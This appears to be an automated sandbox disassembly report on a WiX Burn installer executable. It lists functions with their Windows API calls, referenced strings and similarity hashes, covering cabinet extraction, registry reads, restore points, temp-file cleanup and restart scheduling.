Part of subcall function 00CC309E: LoadLibraryW.KERNELBASE(?,?,00000104,00C91C3B), ref: 00CC3128
Part of subcall function 00CC309E: GetLastError.KERNEL32 ref: 00CC3134

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00CC369B
GetLastError.KERNEL32(?,00C916AF,00000001,00000000,?,?,?,?,00C91DEA,?,?), ref: 00CC36AA

Strings

SRSetRestorePointW, xrefs: 00CC3690
srclient.dll, xrefs: 00CC3679
srputil.cpp, xrefs: 00CC36CC

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressDirectoryLibraryLoadProcSystem_memset
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 2131201312-398595594
Opcode ID: f5a621b3928cfb908a1291badd909b34bcc63211f9cf962f40c46632016a3911
Instruction ID: 3db537288437edcc3b3aa8f8f48dfc039ba18507d89f8a729092639b1e2b99fd
Opcode Fuzzy Hash: f5a621b3928cfb908a1291badd909b34bcc63211f9cf962f40c46632016a3911
Instruction Fuzzy Hash: B201DB33A443E2B7D7211796FC0AF6A3558AB00751F05817DF910EB390D66ACE849AD1

Function 00C98EB9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,?,000000FF,?,00000000,00000030,00C99885,?,00C9AE46,?,00000030,00000000,00000030), ref: 00C98EF2
GetLastError.KERNEL32(?,00C9AE46,?,00000030,00000000,00000030,00C99885,?,00C9B5FC,?,?,00000030), ref: 00C98F28

Strings

Failed to compare strings., xrefs: 00C98F57
variable.cpp, xrefs: 00C98F4D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp
API String ID: 1733990998-1686915864
Opcode ID: 78ed49870b8c60ee8d5c2a0d8cc908c07c4550acdb1e58a3a0ef7ca1c1266463
Instruction ID: 0ac08df5b361998c2fd3ad5acd9e9952343e340c5876bb1db2dc377c4d480a9e
Opcode Fuzzy Hash: 78ed49870b8c60ee8d5c2a0d8cc908c07c4550acdb1e58a3a0ef7ca1c1266463
Instruction Fuzzy Hash: 6621C632A04219EBCF108F98CC49F5AB7A5EF06760F114269F924EB2D0DB70DF049790

Function 00CB6556 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB647C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,00000000,?,?,00CB6584,?,?), ref: 00CB64A1
Part of subcall function 00CB647C: GetLastError.KERNEL32(?,00CB6584,?,?), ref: 00CB64AB

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?), ref: 00CB6592
GetLastError.KERNEL32 ref: 00CB659C

Strings

cabextract.cpp, xrefs: 00CB65C1
Failed to read during cabinet extraction., xrefs: 00CB65CB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 7208d59501b5f524dff9f56153216c5442f8b868b9bb9efc6f8ca1c2ef12bbcf
Instruction ID: 28422b8b46acade685c43a37b6b4154227f94fca5d10590229b59ddd9469dbbf
Opcode Fuzzy Hash: 7208d59501b5f524dff9f56153216c5442f8b868b9bb9efc6f8ca1c2ef12bbcf
Instruction Fuzzy Hash: 9101ED36200205ABCB219FA9DD06F9E3BF8EF84720F10022DF915D7290DB35EA15AA20

Function 00CB647C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,00000000,?,?,00CB6584,?,?), ref: 00CB64A1
GetLastError.KERNEL32(?,00CB6584,?,?), ref: 00CB64AB

Strings

cabextract.cpp, xrefs: 00CB64D0
Failed to move to virtual file pointer., xrefs: 00CB64DA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 2b4aeb03c3a07625e7dcc8bd9a09abb62754ba3443b35efca71448100f8d58a3
Instruction ID: f7fe98c92da4dd8564e2e79afae06b12a8d64aae03717e5fab5f7743cd380c32
Opcode Fuzzy Hash: 2b4aeb03c3a07625e7dcc8bd9a09abb62754ba3443b35efca71448100f8d58a3
Instruction Fuzzy Hash: A2012B32240B02A7C7215A96CC06F9B7BA59F80721F15C03DF618CA190DA39D8445B54

Function 00CC309E Relevance: 6.1, APIs: 4, Instructions: 68libraryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC30C5
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CC30DA
LoadLibraryW.KERNELBASE(?,?,00000104,00C91C3B), ref: 00CC3128
GetLastError.KERNEL32 ref: 00CC3134

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem_memset
String ID:
API String ID: 1376650706-0
Opcode ID: b8febf836c0fe379856f56a02c3ea9368b6a0438abe0e1c944c0e07cdca9739d
Instruction ID: fa4bb1a3180841c8a7d9138906dfa46d2458a32f6898ecc368e8a36231bd864f
Opcode Fuzzy Hash: b8febf836c0fe379856f56a02c3ea9368b6a0438abe0e1c944c0e07cdca9739d
Instruction Fuzzy Hash: 7D1126B6A0035EABDB109B60EC49F8F77ACAF80710F148478E925DB241EA34DB448B60

Function 00CC2B10 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00CBFD8F,?,?,?,00000000,00000000,?,75C0B390,?,?,?,00CC0109,?), ref: 00CC2B18
RtlFreeHeap.NTDLL(00000000,?,00CBFD8F,?,?,?,00000000,00000000,?,75C0B390,?,?,?,00CC0109,?,?), ref: 00CC2B1F
GetLastError.KERNEL32(?,00CBFD8F,?,?,?,00000000,00000000,?,75C0B390,?,?,?,00CC0109,?,?,?), ref: 00CC2B2D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: c2141cd1877ccd524dae8e7a21b7903b458da505055608b98e16358c5db9b8dc
Instruction ID: bb2ced01a90344550c9ba152d0e4116ca595c1aff2017d02c6258099e86d90de
Opcode Fuzzy Hash: c2141cd1877ccd524dae8e7a21b7903b458da505055608b98e16358c5db9b8dc
Instruction Fuzzy Hash: 36D05EB2A50206ABD7101FF6DC4BF2A7B5CAB00742F144438FA2BC5470DB29CD50A675

Function 00CC58E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CC5912

Part of subcall function 00CC573B: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,00CC5923,00000000,?,00000000), ref: 00CC5759
Part of subcall function 00CC573B: GetLastError.KERNEL32(?,?,00CC5923,00000000,?,00000000,?,?,?,?,?,?,?,?,00CB3EA0,00C9222A), ref: 00CC5765

Strings

WixBundleElevated, xrefs: 00CC58F3

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID: WixBundleElevated
API String ID: 52713655-4097796520
Opcode ID: 04b985348ec3ddba03abc5636ecce22df0a279b049c7170fc969d1e7179df3d1
Instruction ID: ca4f8b8196686c6b6b57d6e4b56c7fc301998fb69ece12d2cb3b9b4cdbdce440
Opcode Fuzzy Hash: 04b985348ec3ddba03abc5636ecce22df0a279b049c7170fc969d1e7179df3d1
Instruction Fuzzy Hash: 47314E76E106199FDB00DFA8C884FDEB7F9EF88320F150469E915EB301EA75E9458B60

Function 00CC3DFC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

Strings

regutil.cpp, xrefs: 00CC3E51

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 04364d74146b2b8bd53d793670cf706d48a92e323bcbe74b2076ec986d3b2009
Instruction ID: 15bb1ef2f9b7bf15b1f781932a0926ba9925a46911d002cc2ac5b93c5ba84bd4
Opcode Fuzzy Hash: 04364d74146b2b8bd53d793670cf706d48a92e323bcbe74b2076ec986d3b2009
Instruction Fuzzy Hash: BAF0E93234035F6FEB242D95ECC5F7A355D9F08B64F14813CF605CA152D666CE1053A0

Function 00CC7B94 Relevance: 1.6, APIs: 1, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000000,00CE7044,00000000,00000000,?,?,00CA7A1C,WiX\Burn,PackageCache,00000000,00CE7044,00000000,00000000,00000000), ref: 00CC7BE6

Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,80070002,80070003,00000000,00000000,00000000), ref: 00CC38B2
Part of subcall function 00CC3841: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC38EB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: ebceaa876a60ab38a9fec13990c0afd9efe1d78f850bec44c68a53c771bb654b
Instruction ID: c8f864c17ac072674b3b8c802c74937fdbf2416e6e958f22e7cb60f9d0294be3
Opcode Fuzzy Hash: ebceaa876a60ab38a9fec13990c0afd9efe1d78f850bec44c68a53c771bb654b
Instruction Fuzzy Hash: DF11C27660410AEFCF209E94CE91FAE7BA6EB80355B2505BDF911E3111D7319E50EF60

Function 00CC2603 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00CA7AD4,0000001C,00000000,00000000,00000000,00000000), ref: 00CC2624

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 5571eff3262a04a272ddae4364b988054666af6f86b0100b9e3e4cd34ef2efcf
Instruction ID: 723b15ce63f3917e34cd96f97d5336a9f55f9e955c41b63fc092865667b0558c
Opcode Fuzzy Hash: 5571eff3262a04a272ddae4364b988054666af6f86b0100b9e3e4cd34ef2efcf
Instruction Fuzzy Hash: 13E0C23134122473D6002A91CC02FCA7B8C5F11B54F104009FB04A9090C6A0A1405BB9

Function 00CB6724 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?), ref: 00CB675F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4e0814f646cfc4bd2ec6a5359295f3aff5e7256995dc1a1c2e0b14e6b2bad69a
Instruction ID: e66e6da318f88c59f79d4a2d60cdfceb4514a5b4c96c7c1a871435247260d31f
Opcode Fuzzy Hash: 4e0814f646cfc4bd2ec6a5359295f3aff5e7256995dc1a1c2e0b14e6b2bad69a
Instruction Fuzzy Hash: F5F06D31110204CFDB10DF68D948B587BE4EB04339F0983A0EA298A2F2D739D911CE10

Function 00C91000 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C9100C

Part of subcall function 00C91B46: _memset.LIBCMT ref: 00C91BA5
Part of subcall function 00C91B46: _memset.LIBCMT ref: 00C91BC9
Part of subcall function 00C91B46: CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C91F08

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset$HeapInformationUninitialize
String ID:
API String ID: 1504587645-0
Opcode ID: d89ec2ec848b51acea2d2bba85ea02ad17154f1148c406260f88785dc7ed9f74
Instruction ID: d6b6b66f7ac30f3c9686562e70e57c19a189f05fa52cc57ae71346e54c438250
Opcode Fuzzy Hash: d89ec2ec848b51acea2d2bba85ea02ad17154f1148c406260f88785dc7ed9f74
Instruction Fuzzy Hash: 70E0EC3125024EBBEF01DF91DD4BF9E7B6AAB00749F144414BA00A90D1D7B2EA60AB65

Function 00CC178B Relevance: 1.3, APIs: 1, Instructions: 52stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,00CC2D60,?,00CCB5F8,00000000,?,00000000,00000004,00000000,00000004,?,00000000), ref: 00CC17BC

Part of subcall function 00CC299C: GetProcessHeap.KERNEL32(00000000,?,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC29A4
Part of subcall function 00CC299C: HeapSize.KERNEL32(00000000,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000,?), ref: 00CC29AB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 6ce69514f59e5f396c9e48cb5b77392883c0af416877f7bfc37d9b7e7ce14fec
Instruction ID: 351bdbda4207c43c3945fa25f68f44f2ae64726d0083d416f89948150e4e6883
Opcode Fuzzy Hash: 6ce69514f59e5f396c9e48cb5b77392883c0af416877f7bfc37d9b7e7ce14fec
Instruction Fuzzy Hash: 7301A236200204BBEB106E67DC85F9F379D9F867A4F24411DFE149B182C671E9409BA0

Non-executed Functions

Function 00CC6D15 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 325fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC6D8A
_memset.LIBCMT ref: 00CC6D98
GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00CC6DA1
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6DBC
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,?,00000000), ref: 00CC6E0E
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6E18
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000000,?,00000000), ref: 00CC6E63
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6E6D
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000000,?,00000000), ref: 00CC6EBF
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC6ED0
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000000,?,00000000), ref: 00CC6FB2
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000), ref: 00CC6FC6
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000000,?,00000000), ref: 00CC6FF0
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000000,?,00000000), ref: 00CC7013
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,00000000), ref: 00CC702C
FindNextFileW.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00CC703B
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC704F
RemoveDirectoryW.KERNEL32(?,?,?,?,00000000,?,00000000), ref: 00CC7062
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC7070
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,00000000), ref: 00CC709B
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC70C4
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC70E5
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC7106
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00CC7127
FindClose.KERNEL32(000000FF,?,?,?,00000000,?,00000000), ref: 00CC715B

Strings

DEL, xrefs: 00CC6FE4
*.*, xrefs: 00CC6E98
dirutil.cpp, xrefs: 00CC6DDE, 00CC70B5

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp_memset$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: *.*$DEL$dirutil.cpp
API String ID: 4152325254-1252831301
Opcode ID: 1579fcaf699b0e0db5648a4bb77ef5a4c3fb69659db1ae8a446bd443d32ab887
Instruction ID: e9623c3b7806b92075696d3f161c513d737345b86911cdffcee321bec66f3b55
Opcode Fuzzy Hash: 1579fcaf699b0e0db5648a4bb77ef5a4c3fb69659db1ae8a446bd443d32ab887
Instruction Fuzzy Hash: F9B1D572604219AADB315B75CD0AF9E77BAEFC0710F1502ADE529E6190EB32CE91DF10

Function 00CA8281 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 239COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA82AB

Strings

Failed to get file hash., xrefs: 00CA83A1
Failed to allocate memory, xrefs: 00CA8301
Failed to encode file hash., xrefs: 00CA8409
cache.cpp, xrefs: 00CA8397, 00CA84B7, 00CA8507
Could not verify file %ls., xrefs: 00CA84C4
Could not close verify handle., xrefs: 00CA8511
0, xrefs: 00CA8440
$, xrefs: 00CA845B
Failed to allocate string., xrefs: 00CA83E8
Failed to move file pointer to beginning of file., xrefs: 00CA8332

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$Failed to move file pointer to beginning of file.$cache.cpp
API String ID: 2102423945-1888235766
Opcode ID: 74850d70144f837e4c926ba5563c8600f0f7607906fb4c010ffa12cf57463046
Instruction ID: 261ca3c76b5c7e85210b4c3eb32973dd130662ca5c2201dca74c12890518528f
Opcode Fuzzy Hash: 74850d70144f837e4c926ba5563c8600f0f7607906fb4c010ffa12cf57463046
Instruction Fuzzy Hash: 93818472D0021AAFDF20EF94CC85AEEB7F4AF09314F14013AEA14F7251DA355D499B90

Function 00C913BA Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 142sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,00C91F73,00000000,?,00000000,?,00C91F73,?,?,?,?,?), ref: 00C913E4
OpenProcessToken.ADVAPI32(00000000,?,00C91F73,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C913EB
GetLastError.KERNEL32(?,00C91F73,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C913F5
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00C91445
GetLastError.KERNEL32(?,00C91F73,?,?,?), ref: 00C9144F
AdjustTokenPrivileges.ADVAPI32(00C91F73,00000000,?,00000010,00000000,00000000,?,00C91F73,?,?,?), ref: 00C91494
GetLastError.KERNEL32(?,00C91F73,?,?,?), ref: 00C9149E
Sleep.KERNEL32(000003E8,?,00C91F73,?,?,?), ref: 00C914DB
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 00C914EB
GetLastError.KERNEL32(?,00C91F73,?,?,?), ref: 00C914F5
CloseHandle.KERNEL32(00C91F73), ref: 00C9154F

Strings

Failed to adjust token to add shutdown privileges., xrefs: 00C914CD
Failed to get shutdown privilege LUID., xrefs: 00C9147E
Failed to schedule restart., xrefs: 00C9153A
engine.cpp, xrefs: 00C9141A, 00C91474, 00C914C3, 00C91530
SeShutdownPrivilege, xrefs: 00C91434
Failed to get process token., xrefs: 00C91424

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
